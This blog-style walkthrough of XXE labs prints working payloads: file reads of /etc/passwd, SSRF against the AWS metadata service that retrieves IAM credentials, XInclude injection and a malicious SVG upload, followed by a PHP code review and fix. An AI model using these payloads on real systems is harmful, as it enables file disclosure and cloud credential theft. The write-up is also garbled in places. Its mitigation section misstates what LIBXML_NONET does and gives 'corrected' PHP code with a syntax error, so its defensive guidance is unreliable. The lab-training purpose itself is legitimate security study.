XML External Entities (XXE): Exploiting XML Parsers

mccleod1290

Introduction to XXE : Understanding and Exploiting XML External Entity Vulnerabilities

XML External Entity (XXE) injection, is a powerful vulnerability that exploit a misconfigured XML processors. These parsers when intended to external entities when vulnerable, sensitive files can to dat e read by hthe attackers, remote requests can be executed and even denial of service attacks triggered. This lab teaches the base principals of internal and external entities in XML and how to exploit them to gain a file disclosure.

Understanding XML External Entity (XXE) Vulnerabilities

XML External Entity (XXE) vulnerabilities are caused by an application-XML parser, when they are set up incorrectly or unrestrictive. It let’s the attacker re-structure the XML structure to disclosure of sensitive informations, server-side request forgery (SSRF), even indefinite denial-of-service (DoS).

XML Fundamentals

XML (Extensible Markup Language):
XML is a markup language used for encoding of documents in a format that is human-readable and machine-readable. Every single a clean code file (in fact, altogether files) requires to meet criteria that are heavier than those it was feasible to accomplish to HTML. An XML document almost always has an XML declaration:

  <?xml version="1.0" encoding="UTF-8"?>

XML Declaration:
This statement sets the XML version and encoding.

Document Type Definition (DTD)

DTD:
DTD is a set of rules, which stands as the legal building elements for an XML document. It defines the document structure and specifies the elements and attributes. In a DTD, entities—like variables that hold reusable values can also be defined.

Example of a simple DTD declaring an internal entities:
```
  <!DOCTYPE note [
    <!ENTITY greeting "Hello, World!">
  ]>
  <note>
    <message>&greeting;</message>
  </note>
```
In this case, the internal entity greeting is defined as the string “Hello, World!” is then referenced as &greeting;.

Entities in XML

Internal Entities:
Internal entities are defined directly into the DTD and are equivalent to the literal value. They are used for avoid string repetition and for maintaining similarity.

<!ENTITY company "Example Corp">

When invoked (e.g. &company;), the parser replaces it with the exact string “Example Corp”.

External Entities:
External entities are declared using the SYSTEM or PUBLIC keyword and reference data coming from an external resource by a URI. For instance:

  <!DOCTYPE data [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
  <data>&xxe;</data>

Here, the entity xxe accesses data from /etc/passwd. The URI in an external entity is referred to as the **system}, which names the source location of the external content.

Parameterized Entities:
Such entities are included within DTDs to enable the definition of other entities. They are prefixed with % ` sign or are only available in the DTD. For example:

  <!DOCTYPE config [
    <!ENTITY % common "CommonConfigValue">
    <!ENTITY fullConfig "%common; - Extended">
  ]>
  <config>&fullConfig;</config>

Parameterized entities add more dynamic and modular DTDs but also increase the attack face when misused.

How XXE Works

When an XML parser is creating a document, it replaces entity reference with its value. If an attacker includes a malicious DTD that references an external entity to a sensitive file or an attacker-based URL, the parser accidentally inserts such data in the output or performs unintended network requests. This causes disclosure of data, SSRF and DoS condition if the parser tries to parse a vast amount of data e.g. Billion Laughs attack.

Core Concepts and XML Structure

XML Structure:
POSTs with XML bodies need to be always inspected. Find any place where you can put additional DTD information to inform the system of your custom entities.
Document Type Definitions (DTDs):
DTDs specify the structure of the XML document including entity declarations. Two primary types exist:
Internal Entities: Located in the accompanying XML document, put in syntax such as:

<!ENTITY gar "example value">

Internal assigned objects behave like sorted variables and it is restricted to local content.

External Entities: External entities can be referenced using the SYSTEM keyword and the resource can be specified via a URI such as file:// or http://. For example:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

External entities make the parser pull in and include content from an external source on instruction from outside..

Black Box Testing

Lab 1: Exploiting XXE using external entities to retrieve files

Lab URL - https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

Step 1: Intercept the XML Request:

This step includes app exploration, clicking on every single button , once we view the product and click on view stocks, then we see an POST request, looking at it, it seems to parse xml entities. Let’s start tinkering with the product.

Step 2. Inject the Malicious DTD:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Step 3: Calling back the entity and formatting our XML syntax

Now since productId is reflected in the response, let’s call our entity back here. Our final payload should look something like this.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>
&xxe;
</productId><storeId>1</storeId></stockCheck>

With this modified syntax we would have solved the lab, do note that if you don’t use ; then the XMl parser would throw an error.

Lab 2: Exploiting XXE to perform SSRF attacks

Now this lab is very simple, as for our previous lab we have used file:// protocol, this time we will use http protocol to access internal data. Since this lab is hosted on AWS we would be using their IP address. Now we follow the same steps upto STEP 2 here we modify our payload a bit.

Step 2 : Our payload should look something like the following.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>

<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

We get an error, but worry not, because this error contains our path to the next directory we should look for.

Our response would look something like the following :

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 28

"Invalid product ID: latest"

Once we add latest to our payload, now our newly modified payload would look something like the following :

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest"> ]>

Step 3: Keep on modifying the payload, until we get our details.

Our final payload should be looking like the following. This contains our SecretAccessKey in json format.

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>

Don’t forget to call back our entity, our final payload http request should look something like this. With this we should be able to solve our lab.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>

<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Lab 3: Exploiting XInclude to retrieve files

Lab URL - https://portswigger.net/web-security/xxe/lab-xinclude-attack

When to Use XInclude

In situations, where standard XXE payloads are blocked with entity declaration restrictions as well as when the application only processes a portion of the XML, XInclude provides an alternate attack surface. This technique is achieved by adding an XInclude directive to XML fragments that do not support complete DOCTYPE declarations, thus allowing you to trigger file-fulfilment, on backend systems.

App Exploration:

Now we view the shop and click on check stock option, unlike previous ones we do see an POST request but, this time there is no XML in the request.

Now we do send this to repeater and add our payload. Before that we tried converting this request into JSON and XML , it did not work. We also tried calling empty entities but for security reasons they seem not to be enabled.

The Payload Breakdown

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Our final http request should look something like the following:

POST /product/stock HTTP/2
Host: 0aed0068045ca59e80d5eec200a80017.web-security-academy.net
Cookie: session=sIgSNWBNsJdoh5f2ez8rhpRnlbUCmAGO
Content-Length: 128
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Origin: https://0aed0068045ca59e80d5eec200a80017.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aed0068045ca59e80d5eec200a80017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
&storeId=

Key Components

**Root Element <foo>: A basic container element which only supplies structure for our payload and does not need to adhere to any certain schema

XInclude Namespace Declaration:

  xmlns:xi="http://www.w3.org/2001/XInclude"

This binds the xi prefix to the official XInclude namespace, from now on, the XML-Include element is a red flag to XML processors.

XInclude Element: The core of our exploit:
- href="file:///etc/passwd": Sends the target file that we want retrieve from local filesystem of the server
- parse="text": Essential attribute to the processor that makes it tell to treat the included content as plain raw text instead of XML in order to avoid parsing errors since /etc/passwd is not valid XML

Why This Works

**Bypass Traditional XXE Protections **: XInclude is done at the XML processing level unlike DTD level, it will bypass the restriction from external entity.
Works in Partial XML Contexts: Also works when the application handles only XML snippets or isn’t able to read DOCTYPE

Lab 4: Exploiting XXE via image file upload

The Vulnerability

SVG files are XML native so as vectors for XML External Entity (XXE) attacks when they have no proper defense against upload issues. This post explains how a bad payload in an SVG avatar can use a server exploit.

The Payload Explained

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///etc/hostname" >
]>
<svg width="128px" height="128px"
     xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Save this payload as an .svg and upload in the avatar section. Make sure you upload your avatar in choose file option.

Once you have uploaded, then go to your comments in the blog and view the image you have uploaded. The image should have hostname. Submit the hostname as answer, and with this you have solved your lab.

Breaking Down the Components

XML Declaration : <?xml version="1.0" standalone="yes"?> indicates the XML version, and tells Mark that this document does not refer to any external DTDs, i.e., there is no foreign XML being imported.

DOCTYPE Declaration: Essential part that declares our exploit:

  <!DOCTYPE test [
    <!ENTITY xxe SYSTEM "file:///etc/hostname" >
  ]>

This tells the XML parser to fetch the file contents of /etc/hostname from the server filesystem and replace all of &xxe; with it.

SVG Structure and Namespaces:
- xmlns="http://www.w3.org/2000/svg" declares the default SVG namespace
- xmlns:xlink="http://www.w3.org/1999/xlink" declares the xlink namespace, which helps maintain file validity as an SVG, ensuring proper processing even though it’s not directly used in our exploit

The Attack Vector: <text fontSize="16" x="0" y="16">&xxe;</text> contains the entity reference that will be replaced with server’s hostname when parsed

Why This Works

SVG as a XML Trojan horse: Images created in SVG, being XML based, but they are typically treated as image content, can bypass content filters while carrying an XML payload attack.
Misconfigured Xml Parsers: If the server allows xml parser to load external entity (usually a mistake), the server will load data of the external file.
Information Disclosure: The hostname is displayed as text in the SVG “image” after processing with the information being exfiltrated from the server thanks to the vulnerability.

White Box Testing

Source - Code Analysis:

(Location: OrderController.php inside controllers folder→ order() method)

Here’s the problematic code handling XML input:

else if ($_SERVER['HTTP_CONTENT_TYPE'] === 'application/xml')  
{  
    $order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NOENT);  
    if (!$order->food) return 'You need to select a food option first';  
    return "Your ($order->food) order has been submitted successfully.";  
}

The code is vulnerable to xxe attack due to the following reasons:

1. The vulnerability is in the flags: `LIBXML_NOENT`

The simplexml_load_string() function has LIBXML_NOENT flag. This flag advises the XML parser to expand all XML entities to there values. For example, & becomes &. But then when thrown with external elements, this is ammunition:

<!DOCTYPE root [  
    <!ENTITY xxe SYSTEM "file:///etc/passwd">  
]>  
<order><food>&xxe;</food></order>

Here &xxe; gets expands into /etc/passwd due to the LIBXML_NOENT.

2. No Entity Loader Restrictions

The code does not disable PHP’s External Entity Loader. By default PHP will allow XML parsers to fetch the external resources (such as files or urls). This can be skipped as if it is not disabled, the attackers can read arbitary files.

3. No Input Validation

The application trusts blindly any XML input. There is no validation to defence against kind of risky things such as <!DOCTYPE> or <!ENTITY>.

Exploitation:

First Attempt:

We explore the application and we realise that it sends data through json. So let’s google up quick payload for xxe to get a flag. We end up with the following payload. We do small tweaks to our payload so that we get flag.

Final payload :

<?xm:l version="1.0"?>
<!DOCTYPE test [<!ENTITY test SYSTEM 'file://flag'>]>
<order><food>&test;</food></order>

But our server responds with the following error message:

{“status”:“danger”,“message”:“You need to select a food option first”}

Second Attempt:

Even after changing the json data to xml the web application throws an 400 error. We did change our request using content type converter plugin, but seems like content-type should strictly be Content-Type: application/xml and not Content-Type: application/xml;charset=UTF-8. Our sweet plugin adds this charset=UTF-8 which returns the 404 error.

Despite changing our content type we get the following error. Maybe it has got something to do with the tags.

You need to select a food option first

Third attempt :

Got this payload from walk through, realised my mistake was not using json data as inputs and creating tags. Seems like this web application accepts only certain type of data as input. Our final payload looks somewhat like this :

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///flag"> ]>
<order>
  <table_num>1</table_num>
 <food>&ent;</food>
</order>

With this we successfully get our flag.

Mitigation

Step 1: Remove `LIBXML_NOENT`

This flag is not needed for many use cases and directly enables entity substitution.

Step 2: Disable External Entities

Add this line before XML parser is invoked:

libxml_disable_entity_loader(true); // Block external entities

Step 3: Use Safe Parsing Flags

Replace LIBXML_NOENT with LIBXML_NONET to avoid network request:

$order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);

Corrected Code snippet

else if ($_SERVER['HTTP_CONTENT_TYPE'] === 'application/xml')  
{  
    libxml_disable_entity_loader(true); // 🔒 CRITICAL FIX
    $order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);  
    if (!$order->food) return 'Please choose a food first';  
    return Your ($order->food) order has been successfully submited.  
}

We made in the following code change to our code:

libxml_disable_entity_loader(true)
- Disables PHP ability to load external f.dozens. Even if the SPA tries to inject <!ENTITY>, the parser cant resolve it.
LIBXML_NONET
- Prevents the parser from blocking network access (e.g. http://internal-server).
No Entity Substitution
- If not LIBXML_NOENT, &xxe; remains unchanged.

Note to readers: While this fix looks very appealing, in reality while running docker to build the web application, the whole backend broke down. That’s due to Alpine edge repository did not have php version 7 anymore.

Conclusion: Securing the XML Gateway

XXE vulnerabilities expose a critical flaw in how applications trust and process XML input, which could be abused by anyone who has malicious intent. It servers as a reminder that even structured data can be weaponized. From stealing sensitive files to triggering SSRF attacks, XXE demonstrates how a single misconfigured parser can become a gateway for catastrophic breaches.

Key Takeaways:

Parse xml with caution: XML parsers should ship hardened, disable external entities, validate if not disable external DTD, validate inputs carefully.
Beyond the Obvious: XXE isn’t just about file:// parameters. Methods like XInclude and SVG payloads demonstrate that attackers will create where they cannot solve.
The Mitigation Myth: While in 2025 it became easy to spot errors using AI tools and fix them, most of the production code have a lot of dependencies, and might be deployed on docker, which may get outdated soon. In reality when working with this issue even if we have the right fix, sometimes we might not be able to run the web application. In our case, the dockerfile had an error due to the Alpine edge repository not having PHP 7 anymore.

🔐 The secure path forward? Presume every XML document is a threat – until proven otherwise.